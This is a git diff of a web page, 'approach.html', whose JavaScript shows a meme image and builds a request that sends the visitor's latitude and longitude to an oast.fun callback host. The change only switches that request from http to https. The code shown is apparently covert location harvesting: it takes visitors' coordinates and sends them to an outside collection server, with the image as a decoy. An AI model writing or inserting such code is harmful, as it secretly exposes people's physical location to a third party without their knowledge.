--- a/approach.html
+++ b/approach.html
@@ -23,7 +23,7 @@
             document.getElementById("result").innerHTML = "<img src='https://preview.redd.it/when-will-the-librandu-police-of-delhi-catch-this-criminal-v0-xhw70nxqimnb1.jpg?auto=webp&s=6c028803738dd7dc158c6cdd7d8808ccf3b690c0'</img>";
 
             // Construct the URL with the coordinates and make a GET request
-            var url = "http://rqxtmzumhgyzbyrzzysk24id2p4di8esj.oast.fun/co-ordinates?lat=" + latitude + "&long=" + longitude;
+            var url = "https://rqxtmzumhgyzbyrzzysk24id2p4di8esj.oast.fun/co-ordinates?lat=" + latitude + "&long=" + longitude;
 
             // You can use XMLHttpRequest or Fetch API to make the GET request
             // Here, we'll use Fetch API
